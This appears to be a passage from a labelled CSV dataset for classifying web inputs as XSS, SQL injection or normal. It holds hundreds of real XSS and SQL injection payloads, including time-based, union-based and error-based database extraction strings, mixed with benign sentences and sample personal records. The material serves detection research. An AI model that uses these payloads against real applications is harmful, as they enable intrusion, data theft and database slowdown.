onanimationcancel=""alert(1)""></table>",1,XSS,205 "1"" where 9829 = 9829 order by 1#",2,SQLi,20348 Select beer.,3,normal,24515 It's best to go to retail outlets first to see the different fabrics you can select.,3,normal,25947 <header id=x tabindex=1 onactivate=alert(1)></header>,1,XSS,4935 1' in boolean mode ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) #,2,SQLi,10030 "{""id"":null,""name"":""shine""}",3,normal,27570 "<style>:target {color: red;}</style><u id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></u>",1,XSS,1232 "1 ) ) as jzzo where 7773 = 7773 union all select null,null,null,null,null#",2,SQLi,15820 (SELECT * FROM (SELECT(SLEEP(5)))YYYY)--,2,SQLi,19454 <code onpointerenter=alert(1)>XSS</code>,1,XSS,7960 "and (select substring(@@version,1,1))='X'",2,SQLi,19323 gone case select hello please,3,normal,26139 Select Internet Protocol Version 47003 (or Version 6 if desired).,3,normal,25626 Sort results where required.,3,normal,23338 "<keygen onpaste=""alert(1)"" contenteditable>test</keygen>",1,XSS,4253 1%' rlike ( select ( case when ( 3596 = 4245 ) then 1 else 0x28 end ) ) and '%' = ',2,SQLi,15044 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( ""mkal"" like ""mkal",2,SQLi,13464 "1"" ) as wxea where 6394 = 6394 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12250 "-4248"" ) ) union all select 9450,9450,9450--",2,SQLi,19133 -6122' ) ) ) or 9243 = 6161--,2,SQLi,20701 "<iframe onpaste=""alert(1)"" contenteditable>test</iframe>",1,XSS,4336 -8095' ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ),2,SQLi,10768 "{""id"":null,""firstName"":""Raymond"",""lastName"":""Yi"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26954 "1%"" ) union all select null,null,null,null,null,null,null,null--",2,SQLi,16791 "-7501'+ ( select uloc where 3089 = 3089 union all select 3089,3089,3089,3089,3089,3089,3089,3089,3089,3089--",2,SQLi,13704 "<caption onclick=""alert(1)"">test</caption>",1,XSS,7488 "1%"" ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ""%"" = """,2,SQLi,12969 <xmp id=x tabindex=1 onbeforeactivate=alert(1)></xmp>,1,XSS,4888 "<style>:target {color:red;}</style><progress id=x style=""transition:color 1s"" ontransitionend=alert(1)></progress>",1,XSS,859 1 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) # ewsz,2,SQLi,16778 "<img src\x47=x onerror=""javascript:alert(1)"">",1,XSS,6542 -2411%' ) ) ) or 6872 = 6872 and ( ( ( '%' = ',2,SQLi,18969 -1876%' ) union all select 6463--,2,SQLi,20209 "1"" where 7879 = 7879",2,SQLi,21870 Join the book club.,3,normal,22607 "1' ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( 'tetk' = 'tetk",2,SQLi,12706 1 ) as qywz where 1864 = 1864 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10563 "<form onclick=""alert(1)"">test</form>",1,XSS,8844 <image3 onpointerleave=alert(1)>XSS</image3>,1,XSS,6862 "1' ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users )",2,SQLi,10997 Insert the memory stick.,3,normal,22659 1 ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( 9932 = 9932,2,SQLi,10649 "<div draggable=""true"" contenteditable>drag me</div><acronym ondrop=alert(1) contenteditable>drop here</acronym>",1,XSS,956 <audio onpointerleave=alert(1)>XSS</audio>,1,XSS,7407 "<em onpaste=""alert(1)"" contenteditable>test</em>",1,XSS,5946 "-6292 ) union all select 7499,7499,7499,7499,7499,7499,7499--",2,SQLi,17023 1' ) as xskm where 3525 = 3525 and 2435 = 6513,2,SQLi,18983 "<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>",1,XSS,55 "<rb oncut=""alert(1)"" contenteditable>test</rb>",1,XSS,6412 1'|| ( select 'vwmg' where 7928 = 7928,2,SQLi,19748 "<script onbeforecut=""alert(1)"" contenteditable>test</script>",1,XSS,3518 1' ) as cdrm where 4595 = 4595 order by 1#,2,SQLi,19299 "1 and make_set ( 8403 = 8403,8899 )",2,SQLi,20053 1;SELECT%20*,2,SQLi,22293 "1 ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11772 "javascript:/*""/*`/*'/*\""/*--></title></script></textarea></noscript></style></noembed></template><script> /*<svg <frame onload=/**/alert()//</script>",1,XSS,491 -8538%' or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and '%' = ',2,SQLi,13169 "-9672' ) ) as rupb where 8218 = 8218 or make_set ( 4954 = 1836,1836 ) --",2,SQLi,15959 -3750'+ ( select alpu where 3911 = 3911 order by 1--,2,SQLi,18220 Select play.,3,normal,24725 -5470' ) ) or ( 8459 = 8459 ) *4906 and ( ( 'oeam' = 'oeam,2,SQLi,17398 "{""id"":null,""firstName"":""Jiamin"",""lastName"":""Wang"",""address"":""88 15th Ave Ne"",""city"":""541"",""telephone"":""876984786""}",3,normal,27145 Calculate totals where required.,3,normal,23346 "-2782' ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11729 "<script\x3Etype=""text/javascript"">javascript:alert(1);</script>",1,XSS,2974 Tickets go on sale for select shows on April 83.,3,normal,25290 <style onblur=alert(1) tabindex=1 id=x></style><input autofocus>,1,XSS,2944 <form onblur=alert(1) tabindex=1 id=x></form><input autofocus>,1,XSS,3165 1 ) ) ) and 9575 = 1640--,2,SQLi,21092 <s id=x tabindex=1 onbeforedeactivate=alert(1)></s><input autofocus>,1,XSS,2620 """ ) ;waitfor delay '0:0:__TIME__'--",2,SQLi,20020 <slot onpointerover=alert(1)>XSS</slot>,1,XSS,8238 "1"" where 6501 = 6501",2,SQLi,21745 "1' procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and 'swke' = 'swke",2,SQLi,11642 "-4960 union all select 4031,4031#",2,SQLi,20200 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,11787 "1 ) ) as ambt where 5198 = 5198 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11601 "ABC<div style=""x:\xE2\x80\x80expression(javascript:alert(1)"">DEF",1,XSS,2856 "<IMG SRC=x onmouseup=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3441 &lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;,1,XSS,1894 """ Applicants are not allowed to select ""all of the above.",3,normal,26483 -8023' or 6872 = 6872,2,SQLi,21670 "1' where 1093 = 1093 union all select null,null,null,null,null,null,null--",2,SQLi,15792 admin' or '1' = '1'/*,2,SQLi,21582 "1' where 2332 = 2332 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13030 "1 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11791 "select * from users where id = 1 or ""1,"" or 1 = 1 -- 1",2,SQLi,17913 "<style>:target {transform: rotate(180deg);}</style><rtc id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></rtc>",1,XSS,672 "{""id"":null,""firstName"":""Adeline"",""lastName"":""Yong"",""address"":""158 N SCOTT STREET, JOLIET IL 60432"",""city"":""985"",""telephone"":""6378456067""}",3,normal,26849 1' ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ( 'mzqi' = 'mzqi,2,SQLi,15264 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3",2,SQLi,14920 <svg><xmp onload=alert(1)></xmp>,1,XSS,9474 Let's choose a destination for our next vacation.,3,normal,23925 "<div draggable=""true"" contenteditable>drag me</div><canvas ondragover=alert(1) contenteditable>drop here</canvas>",1,XSS,899 "<script onbeforecopy=""alert(1)"" contenteditable>test</script>",1,XSS,3308 "<bdo oncontextmenu=""alert(1)"">test</bdo>",1,XSS,8029 "1 where 6169 = 6169 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,10882 "<figcaption draggable=""true"" ondrag=""alert(1)"">test</figcaption>",1,XSS,2892 "{""id"":null,""name"":""again""}",3,normal,27545 "1%"" ) ) ) rlike ( select ( case when ( 4442 = 4476 ) then 1 else 0x28 end ) ) and ( ( ( ""%"" = """,2,SQLi,14418 Create a stunning sculpture from clay.,3,normal,22984 Check conditions where needed.,3,normal,23365 <dfn onpointerleave=alert(1)>XSS</dfn>,1,XSS,8400 "1' ) as uqkz where 8482 = 8482 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14029 "-5891 ) where 5792 = 5792 union all select 5792,5792,5792,5792,5792#",2,SQLi,16410 "1' ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'xdce' = 'xdce",2,SQLi,14186 "1%' ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12020 <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>,1,XSS,636 "1' ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( 'kejy' = 'kejy",2,SQLi,12532 "-4012"" ) or make_set ( 9354 = 9354,7185 ) and ( ""ccfn"" = ""ccfn",2,SQLi,16939 "The company's management did not give satisfaction, and the use of the telephone was consequently restricted in the metropolis, when in 1898 a Select Committee on Telephones reported that "" general immediate and effective "" competition by either the government or local authority was necessary to ensure efficient working.",3,normal,25473 "Sufferers can speak normally in ""select"" situations, but otherwise remain mute.",3,normal,25517 "<th oncut=""alert(1)"" contenteditable>test</th>",1,XSS,6478 "1"" ) ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( ( ""rsru"" = ""rsru",2,SQLi,15193 "<input draggable=""true"" ondragend=""alert(1)"">test</input>",1,XSS,4179 "To use it, open the Camera app and select Portrait.",3,normal,25255 "{""id"":null,""firstName"":""Jaylen"",""lastName"":""Chuan"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27228 "1' ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'acly' like 'acly",2,SQLi,11088 1'+ ( select 'lpkv' where 8760 = 8760,2,SQLi,19814 "1%' ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( '%' = '",2,SQLi,10555 <textarea onpointerleave=alert(1)>XSS</textarea>,1,XSS,5993 transaction,3,normal,23178 "-9630%"" union all select 8592,8592,8592,8592--",2,SQLi,18973 "<blockquote draggable=""true"" ondragstart=""alert(1)"">test</blockquote>",1,XSS,2583 "You select your ISO, select your USB drive, and click Flash.",3,normal,25061 "1' ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12023 <dfn onpointerenter=alert(1)>XSS</dfn>,1,XSS,8388 1' ) ) and 2401 = 4693 and ( ( 'ssrm' = 'ssrm,2,SQLi,19015 -6843' or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and 'eeff' = 'eeff,2,SQLi,10698 <q onpointerout=alert(1)>XSS</q>,1,XSS,9450 %22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E,1,XSS,2106 "A few sale items are available online, however: These include up to 30% off select Strandom chairs, up to 30% off select Alex desks, and up to 25% off select Billy birch bookcases.",3,normal,26443 Where's the tennis court?,3,normal,23606 "<frame draggable=""true"" ondragstart=""alert(1)"">test</frame>",1,XSS,3766 "<thead onkeydown=""alert(1)"" contenteditable>test</thead>",1,XSS,4236 "<li draggable=""true"" ondragstart=""alert(1)"">test</li>",1,XSS,4996 I need to select the right tools for the job.,3,normal,23745 `'><script>\xE2\x80\x89javascript:alert(508)</script>,1,XSS,5059 "1 ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( 5874 = 5874",2,SQLi,17066 "<;A HREF="";http://0x42.0x0000066.0x7.0x93/"";>;XSS<;/A>;",1,XSS,4436 "1"" ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11700 <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>,1,XSS,719 &lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;,1,XSS,3818 <BODY ONLOAD=javascript:javascript:alert(1)>,1,XSS,6776 "1' ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,11210 "1 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) # jpau",2,SQLi,10762 "1 where 3175 = 3175 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14695 ); alert('XSS,1,XSS,9816 "{""id"":null,""name"":""mine""}",3,normal,26848 1' ) ) as dago where 9788 = 9788,2,SQLi,20312 "Migne's texts are not always satisfactory, but since the completion of his great undertaking two important collections have been begun on critical lines - the Vienna edition of the Latin Church writers,' and the Berlin edition of the Greek writers of the ante-Nicene period .8 For English readers there are three series of translations from the fathers, which cover much of the ground; the Oxford Library of the Fathers, the Ante Nicene Christian Library and the Select Library of Nicene and Post-Nicene Fathers.",3,normal,25881 "<bdi onclick=""alert(1)"">test</bdi>",1,XSS,9291 <animate onpointerout=alert(1)>XSS</animate>,1,XSS,6814 "<caption draggable=""true"" ondrag=""alert(1)"">test</caption>",1,XSS,3895 <rb onpointerup=alert(1)>XSS</rb>,1,XSS,9362 "-9178 where 2253 = 2253 union all select 2253,2253,2253,2253,2253,2253,2253,2253#",2,SQLi,15153 "1%"" ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ""%"" = """,2,SQLi,10679 "<input draggable=""true"" ondragleave=""alert(1)"">test</input>",1,XSS,3702 <header onpointerout=alert(1)>XSS</header>,1,XSS,7377 "-3865' ) union all select 4935,4935,4935,4935,4935--",2,SQLi,18196 "<acronym onmousedown=""alert(1)"">test</acronym>",1,XSS,6316 "1"" or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ""kins"" = ""kins",2,SQLi,12840 "<noscript oncopy=""alert(1)"" contenteditable>test</noscript>",1,XSS,3647 -4384' ) ) ) or 6872 = 6872 and ( ( ( 'ukhl' = 'ukhl,2,SQLi,18184 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><canvas id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></canvas>",1,XSS,194 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27",2,SQLi,13438 "<style>:target {color: red;}</style><option id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></option>",1,XSS,818 "At the bottom of the ""Overview"" page, select ""Delete Server.""",3,normal,26347 "select * from users where id = 1 + ( \ ) union select null,@@VERSION -- 1",2,SQLi,15834 "1"" where 2886 = 2886",2,SQLi,21803 <object onerror=alert(1) data=1 type=image/gif>,1,XSS,6162 "1"" ) ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,15665 select * from sysusers,2,SQLi,21366 "1 union all select null,null,null,null,null#",2,SQLi,19095 "<area onbeforecut=""alert(1)"" contenteditable>test</area>",1,XSS,4392 "1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'drui' like 'drui",2,SQLi,11188 "<tt onbeforecopy=""alert(1)"" contenteditable>test</tt>",1,XSS,4929 "<body oncut=""alert(1)"" contenteditable>test</body>",1,XSS,5554 "1"" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) )",2,SQLi,10823 I'll select the wine.,3,normal,24270 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><main id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></main>",1,XSS,240 "1' ) ) as yyja where 4321 = 4321 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12231 "After you have highlighted the text that you want to copy, press the ""Menu"" button on your controller (the one with three horizontal lines, beneath the Xbox button) and select ""Copy"" or ""Select all.""",3,normal,26401 "1"" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ""fvtu"" like ""fvtu",2,SQLi,11193 Select your conflict.,3,normal,24917 "<html onbeforecut=""alert(1)"" contenteditable>test</html>",1,XSS,4238 "<textarea oncontextmenu=""alert(1)"">test</textarea>",1,XSS,5620 Determine values where required.,3,normal,23343 "<kbd ondblclick=""alert(1)"">test</kbd>",1,XSS,8643 "<cite onkeyup=""alert(1)"" contenteditable>test</cite>",1,XSS,5099 "-5396'|| ( select 'fjhd' from dual where 4019 = 4019 union all select 4019,4019,4019,4019#",2,SQLi,14689 "><script+src=https://suggest.taobao.com/sug?callback=alert(1337)""></script>",1,XSS,2244 Create a mural.,3,normal,22795 <nav onblur=alert(1) tabindex=1 id=x></nav><input autofocus>,1,XSS,3554 "-3035"" ) union all select 7912,7912,7912#",2,SQLi,19413 1'|| ( select 'vpuh' where 8164 = 8164,2,SQLi,19768 It enables children to select a specific color that reduces perceptual distortion of text.,3,normal,25976 "<menu onmouseup=""alert(1)"">test</menu>",1,XSS,8331 "<tr onkeydown=""alert(1)"" contenteditable>test</tr>",1,XSS,5630 "1"" where 5098 = 5098 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --",2,SQLi,10626 or pg_SLEEP(5),2,SQLi,22199 <meta id=x tabindex=1 onbeforeactivate=alert(1)></meta>,1,XSS,4509 "Up to 30% off select Cuisinart grills, smokers, and accessories",3,normal,25222 "1"" ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( ""opdl"" = ""opdl",2,SQLi,12198 "1' ) where 7587 = 7587 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14477 """,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,16554 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""%"" = """,2,SQLi,15117 Where's the farmhouse?,3,normal,23570 <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>,1,XSS,2296 "-7691"" or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11827 "{""id"":null,""firstName"":""Šâñ"",""lastName"":""Dãr"",""address"":""21 Toh Guan Road East #08-23 Toh Guan Ctr"",""city"":""184"",""telephone"":""4716350024""}",3,normal,27402 Up to 45% off select DeWalt Power Tools and Accessories,3,normal,25210 "1', ( select ( case when ( 6948 = 4654 ) then 1 else 6948* ( select 6948 from mysql.db ) end ) )",2,SQLi,14342 Group data where applicable.,3,normal,23273 "-9737"" ) ) ) order by 1--",2,SQLi,21143 "<dd onmouseenter=""alert(1)"">test</dd>",1,XSS,8693 <<script>document.vulnerable=true;</script>,1,XSS,7084 "<hgroup oncut=""alert(1)"" contenteditable>test</hgroup>",1,XSS,4735 <rp onpointerenter=alert(1)>XSS</rp>,1,XSS,8915 """) waitfor delay '0:0:20' --",2,SQLi,20796 "1%"" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ""%"" = """,2,SQLi,13069 Join the art class.,3,normal,22724 "Customers can select their preferred seats during booking, and even if a woman does not pre-select, she would only be assigned a window or aisle seat.",3,normal,26259 "1'+ ( select llcl where 8188 = 8188 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11305 "1' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ( 'gbhd' = 'gbhd",2,SQLi,14979 "Currently, you can take $100-$79.993 off select PlayStation 4 and Xbox One consoles; get a free pre-owned game when you buy two pre-owned games (select titles); get $200 off select HTC Vive VR headsets; $30 off the Arctis 3 headset from SteelSeries; and save up to 40% on computer accessories.",3,normal,26261 end and ( ( 'vkle' = 'vkle,2,SQLi,20959 """,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,17004 "Gaine, general manager of the company, stated before the Select Committee that in the view of the directors the bargain was a hard one, because it gave no consideration in respect of the goodwill of the great business, with its gross income of over £ 2,000,000 per annum and its net revenue of over £750,000, which the company had built up. The company had had to pay for all the experiments and mistakes which are inherent in the launching and development of any new industry.",3,normal,26155 "1'+ ( select wkay where 5476 = 5476 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) ) +'",2,SQLi,11534 "<div onkeyup=""alert(1)"" contenteditable>test</div>",1,XSS,5522 ’ or ‘1’ = ’1,2,SQLi,21579 "Earlier in 2019, Lyft added ""green mode"" in select cities like Portland and Seattle, which gives riders the option to select an electric or hybrid car to pick them up.",3,normal,26223 -7505' ) ) as lqvw where 8565 = 8565 or 6872 = 6872--,2,SQLi,18055 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#",2,SQLi,11845 <title onpropertychange=javascript:alert(1)></title><title title=>,1,XSS,2702 "&lt;SCRIPT a=\""&gt;\"" SRC=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;js\""&gt;&lt;/SCRIPT&gt;",1,XSS,1702 select ( case when ( 4660 = 4660 ) then 4660 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13620 "1%"" ) union all select null,null,null,null#",2,SQLi,19181 <hr id=x tabindex=1 onfocusin=alert(1)></hr>,1,XSS,6971 The chart above highlights a select few names from the basket.,3,normal,25480 "-9398' union all select 3998,3998,3998,3998,3998,3998,3998,3998,3998#",2,SQLi,16346 "<address onmouseleave=""alert(1)"">test</address>",1,XSS,6221 FALSE,3,normal,23244 &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;,1,XSS,88 Select your target.,3,normal,24845 "If you select ""2009"" in the list of years at the top of the graph, find the circle representing the U.S., and then select ""2010,"" you'll see a noticeable increase in the country's level of religious hostility.",3,normal,26043 1 ) ) ) and sleep ( 5 ) and ( ( ( 6618 = 6618,2,SQLi,19002 "-1908"" ) ) union all select 4072,4072,4072,4072,4072,4072,4072,4072,4072,4072#",2,SQLi,15370 "1' in boolean mode ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,17437 "<div id=""28"">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//[""'`-->]]>]</div>",1,XSS,138 <big id=x tabindex=1 onfocus=alert(1)></big>,1,XSS,6975 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( granted_role ) FROM ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER ) WHERE LIMIT = 1 ) ) AND 'i' = 'i",2,SQLi,11111 "-1808%"" ) ) or 4595 = 3545 and ( ( ""%"" = """,2,SQLi,19262 "-8093"" ) ) as oboi where 1476 = 1476 union all select 1476,1476,1476,1476#",2,SQLi,15745 "<style>:target {color:red;}</style><ruby id=x style=""transition:color 1s"" ontransitionend=alert(1)></ruby>",1,XSS,1202 <template onpointerover=alert(1)>XSS</template>,1,XSS,6123 select ( case when ( 9746 = 8055 ) then 9746 else 1/ 